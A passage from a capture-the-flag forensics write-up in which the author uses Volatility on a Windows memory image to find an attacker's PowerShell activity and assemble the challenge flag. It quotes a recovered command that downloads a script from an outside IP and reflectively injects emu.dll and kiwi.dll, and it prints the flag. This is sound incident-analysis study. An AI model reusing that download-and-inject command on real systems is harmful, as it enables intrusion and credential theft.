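    print(commands(PAYLOAD))
```

The recovered text shows an account being created and added to the local administrators group, which is the event to look for in account-management logs on the affected host.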

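So far only questions 1 and 4 have answers

Only later did I realise that the consoles plugin in vol2 can be used, since it gives a more detailed view of each command.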

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 consoles 

Note that PowerShell ran two commands. Look up the PowerShell PIDs: there are several, and the correct one is 1136; dumping 2520 instead leaves one DLL missing

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 pslist

Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ---------
0x8449c528 powershell.exe         1136   3176     17      432      1      0 2024-06-18 10:01:08 UTC+0000
0x8452f600 powershell.exe         2520   1136     11      306      1      0 2024-06-18 10:01:35 UTC+0000 

Dump the PowerShell process

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 memdump -p 1136 --dump-dir=/root/桌面

Convert it to text

strings ../../1136.dmp > ../../1136.txt

Search for the keyword New-Object

 {iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/emu.dll};Start-Job -ScriptBlock {iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/kiwi.dll}

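The mention of Invoke-ReflectivePEInjection shows that the whole attack scenario involves reflective DLL injection

So the answer to question 2 is Invoke-ReflectivePEInjection, and the answer to question 3 is emu.dll-kiwi.dll

Full flag: DUCTF{monkey.doc.ps1_invoke-reflectivepeinjection_emu.dll-kiwi.dll_5up3r-5ecur3}

Summary

For me the challenges were quite novel, both fun and challenging

I learned how to use a lot of tools, along with some detailed forensic analysis techniques

Some of the write-ups referenced: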

https://warlocksmurf.github.io/posts/ductf2024/

https://www.youtube.com/watch?v=86IwT9UDIsk